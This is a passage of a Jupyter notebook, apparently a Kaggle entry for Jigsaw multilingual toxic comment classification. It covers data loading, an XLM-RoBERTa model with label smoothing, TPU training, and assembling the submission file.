  severe_toxic=df_train['severe_toxic'].values,\n    obscene=df_train['obscene'].values,\n    threat=df_train['threat'].values,\n    insult=df_train['insult'].values,\n    identity_hate=df_train['identity_hate'].values,\n    use_train_transforms=True,\n)\n\ndel df_train\ngc.collect();\n\nfor targets, tokens, attention_masks in train_dataset:\n    break\n\nprint(targets)\nprint(tokens.shape)\nprint(attention_masks.shape)","execution_count":null,"outputs":[]},{"metadata":{"id":"PlcGdUdSYewm","outputId":"96c3a093-38f2-4d27-9efa-6c5cf80f120c","trusted":false},"cell_type":"code","source":"np.unique(train_dataset.get_labels())","execution_count":null,"outputs":[]},{"metadata":{"id":"bW4dEWaYu9NF","outputId":"385ae69f-d23c-41e4-f6f2-a6b492357f24","trusted":false},"cell_type":"code","source":"df_val = get_obj_or_dump(\"val.pkl\")\n\nif df_val is None:\n    df_val = pd.read_csv(f'{ROOT_PATH}/input/jigsaw-multilingual-toxic-comment-classification/validation.csv', index_col='id')\n    df_val['comment_text'] = df_val.parallel_apply(lambda x: clean_text(x['comment_text'], x['lang']), axis=1)\n    get_obj_or_dump(\"val.pkl\", default=df_val)\n\nvalidation_tune_dataset = DatasetRetriever(\n    labels_or_ids=df_val['toxic'].values,\n    comment_texts=df_val['comment_text'].values,\n    langs=df_val['lang'].values,\n    use_train_transforms=True,\n)\n\n#df_val_unclean = df_val\n#df_val = get_obj_or_dump(\"val_cleaned.pkl\")\n\n#if df_val is None:\n#    df_val = df_val_unclean\n#    df_val['comment_text'] = df_val_unclean.parallel_apply(lambda x: clean_text(x['comment_text'], x['lang']), axis=1)\n#    get_obj_or_dump(\"val_cleaned.pkl\", default=df_val)\n\nvalidation_dataset = DatasetRetriever(\n    labels_or_ids=df_val['toxic'].values,\n    comment_texts=df_val['comment_text'].values,\n    langs=df_val['lang'].values,\n    use_train_transforms=False,\n)\n\ndel df_val\n#del df_val_unclean\ngc.collect();\n\nfor targets, tokens, attention_masks in validation_dataset:\n    break\n\nprint(targets)\nprint(tokens.shape)\nprint(attention_masks.shape)","execution_count":null,"outputs":[]},{"metadata":{"id":"zNdADp28v3av","lines_to_next_cell":2,"outputId":"10b55ab9-567d-41a8-e713-c7c91f4d8b78","trusted":false},"cell_type":"code","source":"df_test = get_obj_or_dump(\"test.pkl\")\n\nif df_test is None:\n    df_test = pd.read_csv(f'{ROOT_PATH}/input/jigsaw-multilingual-toxic-comment-classification/test.csv', index_col='id')\n    df_test['comment_text'] = df_test.parallel_apply(lambda x: clean_text(x['content'], x['lang']), axis=1)\n    get_obj_or_dump(\"test.pkl\", default=df_test)\n\ntest_dataset = DatasetRetriever(\n    labels_or_ids=df_test.index.values, ## here different!!!\n    comment_texts=df_test['comment_text'].values,\n    langs=df_test['lang'].values,\n    use_train_transforms=False,\n    test=True\n)\n\ndel df_test\ngc.collect();\n\nfor ids, tokens, attention_masks in test_dataset:\n    break\n\nprint(ids)\nprint(tokens.shape)\nprint(attention_masks.shape)","execution_count":null,"outputs":[]},{"metadata":{"id":"I2bN_NySwU6c","trusted":false},"cell_type":"code","source":"from kaggle_runner.metrics.metrics import matthews_correlation\nclass RocAucMeter(object):\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.y_true = np.array([])\n        self.y_true_float = np.array([], dtype=np.float)\n        self.y_pred = np.array([])\n        self.score = 0\n        self.mc_score = 0\n        self.aux_part = 0\n\n    def update(self, y_true, y_pred, aux_part=0):\n        y_true = y_true[:,:2].cpu().numpy().argmax(axis=1)\n        y_true_float = y_true.astype(np.float)\n        y_pred = nn.functional.softmax(y_pred[:,:2], dim=1).data.cpu().numpy()[:,1]\n        self.y_true = np.hstack((self.y_true, y_true))\n        self.y_true_float = np.hstack((self.y_true_float, y_true_float))\n        self.y_pred = np.hstack((self.y_pred, y_pred))\n\n        self.score = sklearn.metrics.roc_auc_score(self.y_true, self.y_pred, labels=np.array([0, 1]))\n        self.mc_score = matthews_correlation(self.y_true_float, self.y_pred)\n        self.aux_part = aux_part\n\n    @property\n    def avg(self):\n        return self.score\n    @property\n    def mc_avg(self):\n        return self.mc_score\n\nclass AverageMeter(object):\n    \"\"\"Computes and stores the average and current value\"\"\"\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count","execution_count":null,"outputs":[]},{"metadata":{"id":"Ow13PTlFwbiH","trusted":false},"cell_type":"code","source":"import warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport torch_xla\nimport torch_xla.core.xla_model as xm\nimport torch_xla.distributed.parallel_loader as pl\nimport torch_xla.distributed.xla_multiprocessing as xmp\n\nfrom catalyst.data.sampler import DistributedSamplerWrapper, BalanceClassSampler\n\nclass TPUFitter:\n\n    def __init__(self, model, device, config):\n        if not os.path.exists('node_submissions'):\n            os.makedirs('node_submissions')\n\n        self.config = config\n        self.epoch = 0\n        self.log_path = 'log.txt'\n\n        self.model = model\n        self.device = device\n\n        param_optimizer = list(self.model.named_parameters())\n        no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n        optimizer_grouped_parameters = [\n            {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.001},\n            {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n        ]\n\n        self.optimizer = AdamW(optimizer_grouped_parameters, lr=config.lr*xm.xrt_world_size())\n        self.scheduler = config.SchedulerClass(self.optimizer, **config.scheduler_params)\n\n        self.criterion = config.criterion\n        xm.master_print(f'Fitter prepared. Device is {self.device}')\n\n    def fit(self, train_loader, validation_loader):\n        for e in range(self.config.n_epochs):\n            if self.config.verbose:\n                lr = self.optimizer.param_groups[0]['lr']\n                timestamp = datetime.utcnow().isoformat()\n                self.log(f'\\n{timestamp}\\nLR: {lr}')\n\n            t = time.time()\n            para_loader = pl.ParallelLoader(train_loader, [self.device])\n            losses, final_scores = self.train_one_epoch(para_loader.per_device_loader(self.device))\n\n            self.log(f'[RESULT]: Train. Epoch: {self.epoch}, loss: {losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, time: {(time.time() - t):.5f}')\n\n            t = time.time()\n            para_loader = pl.ParallelLoader(validation_loader, [self.device])\n            losses, final_scores = self.validation(para_loader.per_device_loader(self.device))\n\n            self.log(f'[RESULT]: Validation. Epoch: {self.epoch}, loss: {losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, time: {(time.time() - t):.5f}')\n\n            if self.config.validation_scheduler:\n                self.scheduler.step(metrics=final_scores.avg)\n\n            self.epoch += 1\n\n    def run_tuning_and_inference(self, test_loader, validation_tune_loader):\n        for e in range(2):\n            self.optimizer.param_groups[0]['lr'] = self.config.lr*xm.xrt_world_size()\n            para_loader = pl.ParallelLoader(validation_tune_loader, [self.device])\n            losses, final_scores = self.train_one_epoch(para_loader.per_device_loader(self.device))\n            para_loader = pl.ParallelLoader(test_loader, [self.device])\n            self.run_inference(para_loader.per_device_loader(self.device))\n\n    def validation(self, val_loader):\n        self.model.eval()\n        losses = AverageMeter()\n        final_scores = RocAucMeter()\n\n        t = time.time()\n\n        for step, (targets, inputs, attention_masks) in enumerate(val_loader):\n            if self.config.verbose:\n                if step % self.config.verbose_step == 0:\n                    xm.master_print(\n                        f'Valid Step {step}, loss: ' + \\\n                        f'{losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, ' + \\\n                        f'time: {(time.time() - t):.5f}'\n                    )\n            with torch.no_grad():\n                inputs = inputs.to(self.device, dtype=torch.long)\n                attention_masks = attention_masks.to(self.device, dtype=torch.long)\n                targets = targets.to(self.device, dtype=torch.float)\n\n                outputs = self.model(inputs, attention_masks)\n                loss = self.criterion(outputs, targets)\n\n                batch_size = inputs.size(0)\n\n                final_scores.update(targets, outputs)\n                losses.update(loss.detach().item(), batch_size)\n\n        return losses, final_scores\n\n    def train_one_epoch(self, train_loader):\n        self.model.train()\n\n        losses = AverageMeter()\n        final_scores = RocAucMeter()\n        t = time.time()\n\n        for step, (targets, inputs, attention_masks) in enumerate(train_loader):\n            if self.config.verbose:\n                if step % self.config.verbose_step == 0:\n                    self.log(\n                        f'Train Step {step}, loss: ' + \\\n                        f'{losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, ' + \\\n                        f'time: {(time.time() - t):.5f}'\n                    )\n\n            inputs = inputs.to(self.device, dtype=torch.long)\n            attention_masks = attention_masks.to(self.device, dtype=torch.long)\n            targets = targets.to(self.device, dtype=torch.float)\n\n            self.optimizer.zero_grad()\n\n            outputs = self.model(inputs, attention_masks)\n            loss = self.criterion(outputs, targets)\n\n            batch_size = inputs.size(0)\n\n            final_scores.update(targets, outputs)\n\n            losses.update(loss.detach().item(), batch_size)\n\n            loss.backward()\n            xm.optimizer_step(self.optimizer)\n\n            if self.config.step_scheduler:\n                self.scheduler.step()\n\n        self.model.eval()\n        self.save('last-checkpoint.bin')\n\n        return losses, final_scores\n\n    def run_inference(self, test_loader):\n        self.model.eval()\n        result = {'id': [], 'toxic': []}\n        t = time.time()\n\n        for step, (ids, inputs, attention_masks) in enumerate(test_loader):\n            if self.config.verbose:\n                if step % self.config.verbose_step == 0:\n                    xm.master_print(f'Prediction Step {step}, time: {(time.time() - t):.5f}')\n\n            with torch.no_grad():\n                inputs = inputs.to(self.device, dtype=torch.long)\n                attention_masks = attention_masks.to(self.device, dtype=torch.long)\n                outputs = self.model(inputs, attention_masks)\n                toxics = nn.functional.softmax(outputs, dim=1).data.cpu().numpy()[:,1]\n\n            result['id'].extend(ids.cpu().numpy())\n            result['toxic'].extend(toxics)\n\n        result = pd.DataFrame(result)\n        node_count = len(glob('node_submissions/*.csv'))\n        result.to_csv(f'node_submissions/submission_{node_count}_{datetime.utcnow().microsecond}_{random.random()}.csv', index=False)\n\n    def save(self, path):\n        xm.save(self.model.state_dict(), path)\n\n    def log(self, message):\n        if self.config.verbose:\n            xm.master_print(message)\n        with open(self.log_path, 'a+') as logger:\n            xm.master_print(f'{message}', logger)","execution_count":null,"outputs":[]},{"metadata":{"id":"kO9ovGhdwb7W","trusted":false},"cell_type":"code","source":"from transformers import XLMRobertaModel\n\nclass ToxicSimpleNNModel(nn.Module):\n\n    def __init__(self, use_aux=True):\n        super(ToxicSimpleNNModel, self).__init__()\n        self.backbone = XLMRobertaModel.from_pretrained(BACKBONE_PATH)\n        self.dropout = nn.Dropout(0.3)\n        aux_len = 0\n\n        if use_aux:\n            aux_len = 5\n        self.linear = nn.Linear(\n            in_features=self.backbone.pooler.dense.out_features*2,\n            out_features=2+aux_len,\n        )\n\n    def forward(self, input_ids, attention_masks):\n        bs, seq_length = input_ids.shape\n        seq_x, _ = self.backbone(input_ids=input_ids, attention_mask=attention_masks)\n        apool = torch.mean(seq_x, 1)\n        mpool, _ = torch.max(seq_x, 1)\n        x = torch.cat((apool, mpool), 1)\n        x = self.dropout(x)\n\n        return self.linear(x)\n","execution_count":null,"outputs":[]},{"metadata":{"id":"arcC5IeYxUbr","trusted":false},"cell_type":"code","source":"from kaggle_runner import may_debug\n\n\nclass LabelSmoothing(nn.Module):\n    \"\"\"https://github.com/pytorch/pytorch/issues/7455#issuecomment-513062631\"\"\"\n\n    def __init__(self, smoothing = 0.1, dim=-1):\n        super(LabelSmoothing, self).__init__()\n        self.cls = 2\n        self.confidence = 1.0 - smoothing\n        self.smoothing = smoothing\n        self.dim = dim\n\n    def forward(self, x, target):\n        if self.training:\n            pred = x[:,:2].log_softmax(dim=self.dim)\n            aux=x[:, 2:]\n\n            toxic_target = target[:,:2]\n            aux_target = target[:, 2:]\n            with torch.no_grad():\n                # smooth_toxic = pred.data.clone()\n                smooth_toxic = self.smoothing + (1-self.smoothing*2)*toxic_target\n                # smooth_toxic.scatter_(1, toxic_target.data.unsqueeze(1), self.confidence) # only for 0 1 label, put confidence to related place\n                # for 0-1, 0 -> 0.1, 1->0.9.(if 1), if zero. 0->0.9, 1->0.1\n                smooth_aux = self.smoothing + (1-self.smoothing*2)*aux_target  # only for binary cross entropy, so for lable, it is (1-smooth)*\n\n            aux_loss = torch.nn.functional.binary_cross_entropy_with_logits(aux, smooth_aux)\n\n            return torch.mean(torch.sum(-smooth_toxic * pred, dim=self.dim)) + aux_loss/3\n        else:\n            return torch.nn.functional.cross_entropy(x[:,:2], target[:,:2])","execution_count":null,"outputs":[]},{"metadata":{"id":"dZmTJ4XQwb9y","trusted":false},"cell_type":"code","source":"class TrainGlobalConfig:\n    \"\"\" Global Config for this notebook \"\"\"\n    num_workers = 0  # количество воркеров для loaders\n    batch_size = 16  # bs\n    n_epochs = 3  # количество эпох для обучения\n    lr = 0.5 * 1e-5 # стартовый learning rate (внутри логика работы с мульти TPU домножает на кол-во процессов)\n    fold_number = 0  # номер фолда для обучения\n\n    # -------------------\n    verbose = True  # выводить принты\n    verbose_step = 25  # количество шагов для вывода принта\n    # -------------------\n\n    # --------------------\n    step_scheduler = False  # выполнять scheduler.step после вызова optimizer.step\n    validation_scheduler = True  # выполнять scheduler.step после валидации loss (например для плато)\n    SchedulerClass = torch.optim.lr_scheduler.ReduceLROnPlateau\n    scheduler_params = dict(\n        mode='max',\n        factor=0.7,\n        patience=0,\n        verbose=False,\n        threshold=0.0001,\n        threshold_mode='abs',\n        cooldown=0,\n        min_lr=1e-8,\n        eps=1e-08\n    )\n    # --------------------\n\n    # -------------------\n    criterion = LabelSmoothing()\n    # -------------------","execution_count":null,"outputs":[]},{"metadata":{"id":"_79qoceFwcAF","outputId":"e92a2853-ca98-4d26-9b93-db0bdf2a899f","trusted":false},"cell_type":"code","source":"net = ToxicSimpleNNModel()","execution_count":null,"outputs":[]},{"metadata":{"id":"InecI_CbxXA_","lines_to_next_cell":2,"trusted":false},"cell_type":"code","source":"def _test_model_fn(device=xm.xla_device()):\n    \"test with CPU, easier to debug\"\n    from kaggle_runner import logger\n    net.to(device)\n\n    #test_sampler = torch.utils.data.distributed.DistributedSampler(\n    #    test_dataset,\n    #    num_replicas=xm.xrt_world_size(),\n    #    rank=xm.get_ordinal(),\n    #    shuffle=False\n    #)\n    test_loader = torch.utils.data.DataLoader(\n        test_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n    #    sampler=test_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n\n    def validation(model, device, config, val_loader, criterion):\n        model.eval()\n        losses = AverageMeter()\n        final_scores = RocAucMeter()\n\n        t = time.time()\n\n        for step, (targets, inputs, attention_masks) in enumerate(val_loader):\n            if config.verbose:\n                if step % config.verbose_step == 0:\n                    logger.info(\n                        f'Valid Step {step}, loss: ' + \\\n                        f'{losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, ' + \\\n                        f'time: {(time.time() - t):.5f}'\n                    )\n            with torch.no_grad():\n                inputs = inputs.to(device, dtype=torch.long)\n                attention_masks = attention_masks.to(device, dtype=torch.long)\n                targets = targets.to(device, dtype=torch.float)\n\n                outputs = model(inputs, attention_masks)\n                loss = criterion(outputs, targets)\n\n                batch_size = inputs.size(0)\n\n                final_scores.update(targets, outputs)\n                losses.update(loss.detach().item(), batch_size)\n\n    def run_inference(model, device, config, test_loader):\n        model.eval()\n        result = {'id': [], 'toxic': []}\n        t = time.time()\n\n        for step, (ids, inputs, attention_masks) in enumerate(test_loader):\n            if config.verbose:\n                if step % config.verbose_step == 0:\n                    logger.info(f'Prediction Step {step}, time: {(time.time() - t):.5f}')\n\n            with torch.no_grad():\n                inputs = inputs.to(device, dtype=torch.long)\n                attention_masks = attention_masks.to(device, dtype=torch.long)\n                outputs = model(inputs, attention_masks)\n                toxics = nn.functional.softmax(outputs, dim=1).data.cpu().numpy()[:,1]\n\n            result['id'].extend(ids.cpu().numpy())\n            result['toxic'].extend(toxics)\n\n        return result\n    #validation_sampler = torch.utils.data.distributed.DistributedSampler(\n    #    validation_dataset,\n    #    num_replicas=xm.xrt_world_size(),\n    #    rank=xm.get_ordinal(),\n    #    shuffle=False\n    #)\n    validation_loader = torch.utils.data.DataLoader(\n        validation_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n    #    sampler=validation_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n\n    #train_sampler = DistributedSamplerWrapper(\n    #    sampler=BalanceClassSampler(labels=train_dataset.get_labels(), mode=\"downsampling\"),\n    #    num_replicas=xm.xrt_world_size(),\n    #    rank=xm.get_ordinal(),\n    #    shuffle=True\n    #)\n    #train_loader = torch.utils.data.DataLoader(\n    #    train_dataset,\n    #    batch_size=TrainGlobalConfig.batch_size,\n    #    sampler=train_sampler,\n    #    pin_memory=False,\n    #    drop_last=True,\n    #    num_workers=TrainGlobalConfig.num_workers,\n    #)\n    #validation_tune_sampler = torch.utils.data.distributed.DistributedSampler(\n    #    validation_tune_dataset,\n    #    num_replicas=xm.xrt_world_size(),\n    #    rank=xm.get_ordinal(),\n    #    shuffle=True\n    #)\n    validation_tune_loader = torch.utils.data.DataLoader(\n        validation_tune_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        #sampler=validation_tune_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n    #test_sampler = torch.utils.data.distributed.DistributedSampler(\n    #    test_dataset,\n    #    num_replicas=xm.xrt_world_size(),\n    #    rank=xm.get_ordinal(),\n    #    shuffle=False\n    #)\n    test_loader = torch.utils.data.DataLoader(\n        test_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        #sampler=test_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n\n    def train_one_epoch(self, train_loader):\n        self.model.train()\n\n        losses = AverageMeter()\n        final_scores = RocAucMeter()\n        t = time.time()\n\n        for step, (targets, inputs, attention_masks) in enumerate(train_loader):\n            if self.config.verbose:\n                if step % self.config.verbose_step == 0:\n                    self.log(\n                        f'Train Step {step}, loss: ' + \\\n                        f'{losses.avg:.5f}, final_score: {final_scores.avg:.5f}, mc_score: {final_scores.mc_avg:.5f}, ' + \\\n                        f'time: {(time.time() - t):.5f}'\n                    )\n\n            inputs = inputs.to(self.device, dtype=torch.long)\n            attention_masks = attention_masks.to(self.device, dtype=torch.long)\n            targets = targets.to(self.device, dtype=torch.float)\n\n            self.optimizer.zero_grad()\n\n            outputs = self.model(inputs, attention_masks)\n            loss = self.criterion(outputs, targets)\n\n            batch_size = inputs.size(0)\n\n            final_scores.update(targets, outputs)\n\n            losses.update(loss.detach().item(), batch_size)\n\n            loss.backward()\n            xm.optimizer_step(self.optimizer)\n\n            if self.config.step_scheduler:\n                self.scheduler.step()\n\n        self.model.eval()\n        #self.save('last-checkpoint.bin')\n\n        return losses, final_scores\n\n    def run_tuning_and_inference(self, test_loader, validation_tune_loader):\n        for e in range(1):\n            self.optimizer.param_groups[0]['lr'] = self.config.lr*8\n            losses, final_scores = self.train_one_epoch(validation_tune_loader)\n            run_inference(net, device, TrainGlobalConfig, validation_loader)\n\n    #fitter = TPUFitter(model=net, device=device, config=TrainGlobalConfig)\n    #from types import MethodType\n    #fitter.train_one_epoch = MethodType(train_one_epoch, fitter)\n    #fitter.run_tuning_and_inference = MethodType(run_tuning_and_inference, fitter)\n\n    #fitter.run_tuning_and_inference(test_loader, validation_tune_loader)  # error happens here\n\n    losses, final_scores = validation(net, device, TrainGlobalConfig, validation_loader, TrainGlobalConfig.criterion)\n    logger.info(f\"Val results: losses={losses}, final_scores={final_scores}\")\n\n    results = run_inference(net, device, TrainGlobalConfig, validation_loader)\n    logger.info(f\"Test done, result len %d\", len(results))","execution_count":null,"outputs":[]},{"metadata":{"id":"INecI_CbxXA_","trusted":false},"cell_type":"code","source":"#_test_model_fn()\n\ndef _mp_fn(rank, flags):\n    device = xm.xla_device()\n    net.to(device)\n\n    train_sampler = DistributedSamplerWrapper(\n        sampler=BalanceClassSampler(labels=train_dataset.get_labels(), mode=\"downsampling\"),\n        num_replicas=xm.xrt_world_size(),\n        rank=xm.get_ordinal(),\n        shuffle=True\n    )\n    train_loader = torch.utils.data.DataLoader(\n        train_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        sampler=train_sampler,\n        pin_memory=False,\n        drop_last=True,\n        num_workers=TrainGlobalConfig.num_workers,\n    )\n    validation_sampler = torch.utils.data.distributed.DistributedSampler(\n        validation_dataset,\n        num_replicas=xm.xrt_world_size(),\n        rank=xm.get_ordinal(),\n        shuffle=False\n    )\n    validation_loader = torch.utils.data.DataLoader(\n        validation_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        sampler=validation_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n    validation_tune_sampler = torch.utils.data.distributed.DistributedSampler(\n        validation_tune_dataset,\n        num_replicas=xm.xrt_world_size(),\n        rank=xm.get_ordinal(),\n        shuffle=True\n    )\n    validation_tune_loader = torch.utils.data.DataLoader(\n        validation_tune_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        sampler=validation_tune_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n    test_sampler = torch.utils.data.distributed.DistributedSampler(\n        test_dataset,\n        num_replicas=xm.xrt_world_size(),\n        rank=xm.get_ordinal(),\n        shuffle=False\n    )\n    test_loader = torch.utils.data.DataLoader(\n        test_dataset,\n        batch_size=TrainGlobalConfig.batch_size,\n        sampler=test_sampler,\n        pin_memory=False,\n        drop_last=False,\n        num_workers=TrainGlobalConfig.num_workers\n    )\n\n    if rank == 0:\n        time.sleep(1)\n\n    fitter = TPUFitter(model=net, device=device, config=TrainGlobalConfig)\n    fitter.fit(train_loader, validation_loader)\n    fitter.run_tuning_and_inference(test_loader, validation_tune_loader)","execution_count":null,"outputs":[]},{"metadata":{"id":"aKuUULH7l5W1","outputId":"691c8002-095f-4722-c403-e177f94b7504","trusted":false},"cell_type":"code","source":"FLAGS={}\nxmp.spawn(_mp_fn, args=(FLAGS,), nprocs=8, start_method='fork')\nfrom datetime import date; today = date.today(); output_model_file='bert_tpu_trained.bin'\ntorch.save(net.state_dict(), f\"{today}_{output_model_file}\")","execution_count":null,"outputs":[]},{"metadata":{"id":"Wu0VhhZAFuYs","trusted":false},"cell_type":"code","source":"submission = pd.concat([pd.read_csv(path) for path in glob('node_submissions/*.csv')]).groupby('id').mean()\nsubmission['toxic'].hist(bins=100)","execution_count":null,"outputs":[]},{"metadata":{"id":"RRr-yzJ_yVTW","trusted":false},"cell_type":"code","source":"submission.to_csv(f'{ROOT_PATH}/submission.csv')","execution_count":null,"outputs":[]},{"metadata":{"id":"ARz9TllfyVVa","trusted":false},"cell_type":"code","source":"# !cp log.txt '/content/drive/My Drive/jigsaw2020-kaggle-public-baseline/'\n!make push_dataset","execution_count":null,"outputs":[]}],"metadata":{"kernelspec":{"language":"python","display_name":"Python 3","name":"python3"},"language_info":{"pygments_lexer":"ipython3","nbconvert_exporter":"python","version":"3.6.4","file_extension":".py","codemirror_mode":{"name":"ipython","version":3},"name":"python","mimetype":"text/x-python"}},"nbformat":4,"nbformat_minor":4}